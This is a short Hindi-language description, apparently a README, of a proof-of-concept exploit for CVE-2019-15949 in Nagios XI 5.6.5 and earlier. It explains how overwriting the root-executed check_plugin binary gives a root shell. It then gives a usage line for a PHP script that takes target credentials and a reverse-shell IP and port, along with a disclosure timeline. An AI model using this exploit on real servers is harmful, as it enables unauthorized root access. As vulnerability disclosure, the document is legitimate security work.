
POC जो Nagios XI (5.6.5) में मौजूद एक भेद्यता का शोषण करके रूट शेल प्राप्त करता है
Nagios XI <= 5.6.5 में एक भेद्यता मौजूद है जो हमलावर को रूट विशेषाधिकार बढ़ाने के लिए RCE का उपयोग करने की अनुमति देती है।
इस एक्सप्लॉइट के लिए सर्वर तक 'nagios' उपयोगकर्ता के रूप में पहुँच आवश्यक है, या प्लगइन प्रबंधित करने की अनुमति के साथ वेब इंटरफ़ेस के माध्यम से CCM पहुँच आवश्यक है।
getprofile.sh स्क्रिप्ट, जो सिस्टम प्रोफ़ाइल (profile.php?cmd=download) डाउनलोड करने से आहूत होती है, पासवर्ड-रहित sudo प्रविष्टि के माध्यम से रूट के रूप में निष्पादित होती है; स्क्रिप्ट 'check_plugin' निष्पादन योग्य चलाती है जो nagios उपयोगकर्ता के स्वामित्व में है।
Nagios XI में प्लगइन संशोधित करने की अनुमति वाला लॉग-इन उपयोगकर्ता, या सर्वर पर 'nagios' उपयोगकर्ता, 'check_plugin' निष्पादन योग्य को संशोधित कर सकता है और रूट के रूप में निष्पादन योग्य दुर्भावनापूर्ण कमांड डाल सकता है।
एक PHP POC विकसित किया गया है जो रिवर्स रूट शेल के परिणामस्वरूप पेलोड अपलोड करता है।
उपयोग:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Nagios को रिपोर्ट किया गया: 29 जुलाई 2019
Nagios द्वारा पुष्टि की गई: 29 जुलाई 2019
संस्करण 5.6.6 में ठीक किया गया: 20 अगस्त 2019
CVE निर्धारित: 6 सितंबर 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
